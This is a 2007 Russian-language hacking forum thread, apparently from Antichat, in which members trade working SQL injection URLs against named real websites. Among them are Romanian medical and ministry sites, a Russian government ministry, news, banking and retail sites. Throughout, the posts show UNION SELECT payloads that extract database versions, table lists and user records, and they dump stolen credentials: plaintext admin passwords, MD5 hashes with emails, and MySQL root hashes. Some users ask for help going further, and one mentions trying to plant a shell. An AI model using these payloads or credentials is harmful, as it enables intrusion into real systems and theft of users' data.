23.11.2007, 09:59
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами:
10194175
Репутация:
524
|
|
Румыния
mednews.ro - медицина
Код:
http://www.mednews.ro/arh.php?searchtype=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11/*&searchterm=a
4.1.22-standard:mednews_mednews:mednews_mamb1@localhost (нижняя строка таблицы)
ФТП: ftp.mednews.ro
esp2000.ro - Electronica Azi
Код:
http://www.esp2000.ro/articol.php?id_ar=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18/*
4.0.27-log:electronicaazi:electronicaazi@localhost
interactiunietnice.ro
Код:
http://www.interactiunietnice.ro/articol.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7/*
5.0.27-standard-log:interact_main:interact_root@localhost
51 таблица:
Код:
http://www.interactiunietnice.ro/articol.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(table_name,0x71),0x71),4,5,6,7+from+information_schema.tables+limit+50,1/*
Наша таба - phpbb_users - интересные поля:
Код:
username,user_password,user_level,user_email,user_icq,user_website,user_aim,user_yim,user_msnm,user_occ
Словарики хилые, поэтому данные на админа только так [ login:MD5(pass):email]:
Код:
redactor:92a7593c6875ef1bdf0b4c779dd3efd6:redactia@interactiunietnice.ro
|
|
|
23.11.2007, 14:59
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
С нами:
10194175
Репутация:
524
|
|
Румыния ... как ни странно!
ms.ro - какое-то медицинское Министерство Румынии
Код:
http://www.ms.ro/afis/pag.asp?idd=94&doi=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10/*
5.0.27-community-max-nt:a_ms:ODBC@localhost
59 таблиц:
Код:
decl_av
lst
lst_sc
men
men_bk
pghtml
viz2
viz2_old
vizms
bm
cat_caz
cat_indicator
cat_jud
cat_sectiune
date_jud
ape
ape_av
ape_comp
ape_comp_not
aviz
chimice
cosme
judete
nc_aprob
nc_aprob1
nc_aprob_r
not_cosm
not_cosm1
not_cosm_dbl
not_cosm_r
not_lab
not_lab_notif
not_lab_prod
notif
produs
scheme
sup_al
tari
discut
pro_disc
abilitari_notificari
abilitari_notificari_upload
activ_demnitari
По названиям таблиц - мало что понятно,
по названию полей в таблицах - ещё меньше... Вобщем заипался юзеров искать!
Кое-какие сведения юзеров встретил в табе notif
acta-cytol.com - журнал клинической цитологии и цитопатологии Румынии
Код:
http://www.acta-cytol.com/toc/auto_abstract.php?id=-1+-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
4.0.13-nt:acta:acta_db@localhost
|
|
|
|
23.11.2007, 15:33
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами:
10054253
Репутация:
86
|
|
http://www.dropball.ru/casino-bet.php?t=e07&userid=-1+union+select+1,2,3,4,5,6,7,8/*
Что делать дальше? Отпишитесь пожалуйста.
dropball@localhost
Последний раз редактировалось Mike 007; 23.11.2007 в 15:36..
|
|
|
|
23.11.2007, 19:03
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
С нами:
10240623
Репутация:
79
|
|
Сообщение от Mike 007
http://www.dropball.ru/casino-bet.php?t=e07&userid=-1+union+select+1,2,3,4,5,6,7,8/*
Что делать дальше? Отпишитесь пожалуйста.
dropball@localhost
БД версия 4
Нашёл только w3t_Boards w3t_Posts
Хотя вру там учитывай регистр тебе не покажет w3t_user а w3t_User будет верно
т.е.
Код HTML:
http://www.dropball.ru/casino-bet.php?t=e07&userid=-1+UNION+SELECT+1,2,3,4,5,6,7,8+FROM+w3t_Users/*
Полей пока не нашёл
|
|
|
|
23.11.2007, 20:37
|
|
Новичок
Регистрация: 21.11.2007
Сообщений: 15
С нами:
9721674
Репутация:
21
|
|
есть немного
Газетки почитать ..
http://www.trud.ru/issue/article.php?id=-200711212130102%20union%20select%201,2,3,name,5,pa ssword,7,8,9,10,11,12,13,14%20from%20forum.ibf_mem bers%20where%20id=1/*
в админке был..залить шел не удалось..чет там намудрил админ..
Тут погода ..типа 
http://news.gismeteo.ru/?newsitem=63331505902%20UNION%20select%201,2,3,4,5 ,6%20from%20news
..ничего не понял..т.е. че делать дальше не придумал
Банкир.ру ..
http://kurs.bankir.ru/index.php/abs/1/?v2=0&v1=170&fromd=23&fromm=10&fromy=2007&tod=-23'%20union%20select%201,2,3,version()/*&tom=11&toy=2007
Пятый мускул.. есть там чет типа админки, но только курсы валют подходят, до админки самого банкира (админ.банкир.ру) так и не добрался.. если есть в зале жуки майские, поднимите руку.
http://maryjane.ru - магазин футболок..
http://maryjane.ru/?action=reprintrequest&goodId=-16422'%20union%20select%201,2,3,4,5,version(),7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36/*
таблица юзерс..поле пассворд..да сами все пймете..
5.0.27 |
|
|
|
23.11.2007, 20:21
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
С нами:
10054253
Репутация:
86
|
|
https://www.cbil.upenn.edu/svn/gus/GusAppFramework/tags/DistribJob_release_1-0/Model/schema/oracle/users.sql
а тут что можно сделать?
|
|
|
|
23.11.2007, 21:03
|
|
Познающий
Регистрация: 26.11.2006
Сообщений: 49
С нами:
10240623
Репутация:
79
|
|
Министерство природных ресурсов российской федерации
Код HTML:
http://www.mnr.gov.ru/part/?act=more&id=4409&pid=11+UNION+SELECT+concat(login,0x3a,password),2+From+users+limit+1,1/*
БД версии 4
SANTIAGO:GAHAN200
ADMIN_CONT:WAS4CRF
ADMIN_NEWS:ADMKOMP
ADMIN_VODA:HGC3MK9S |
|
|
|
23.11.2007, 21:42
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
ЕЕстония
www.kert.diip.ee
Код:
http://kert.diip.ee/index.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5+--+
4.1.22-standard-log:diip_kert@localhost:diip_kert
Код:
http://kert.diip.ee/index.php?id=-1+union+select+1,2,concat_ws(0x3a,user_name,password),4,5+from+user+limit+0,1+--+
past:f16b82ee4c79ac26a8c8882cb2e7c525
niko:f42a0453acb448913db7ac8340b5b4f7
anc:e8a28a7ba22e61ddd16612b6d0d6947f
joe:539e53ab51366fccd762c14cfb4a4665
------------------------------------
86 пользователей
|
|
|
|
23.11.2007, 22:10
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
С нами:
10886422
Репутация:
259
|
|
Код:
http://www.adapt.org/adaptpr/index.php?mode=P&id=-253+union+select+1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7/*
www@localhost:: archives:: 4.0.12-max
Код:
http://www.troc-velo.com/index.php?mode=1&annonce=-46890+union+select+concat_ws(char(58,58),user(),database(),version()),2,3,4/*
webmaster@web.planet-work.net:: webmaster:: 5.0.32-Debian_7etch1-l
89 таблиц |
|
|
|
23.11.2007, 23:41
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
С нами:
9762146
Репутация:
1174
|
|
www.kromestudios.com
4.1.11-Debian_4sarge5-log
Код:
http://www.kromestudios.com/games/overview.php?id=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71),AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71)),9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+mysql.user+--+
root:3da66bb67d498077
root:*33674D9ADE349AFD9256D9D109447C6F0540E387
:*33674D9ADE349AF
webmaster:0e1c10731366477a
web_bushrescue:76b68e694c41cbd4
sdb:273ff1036ed30d3f
kromeweb:772deb3439d64f29
web_bushrescue:
NOTQ:772deb3439d64f29
andygreen:7ca4c29d7375760c
kromeweb:*C8B0D9F346E669563013B3830EDB947F940930D9
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
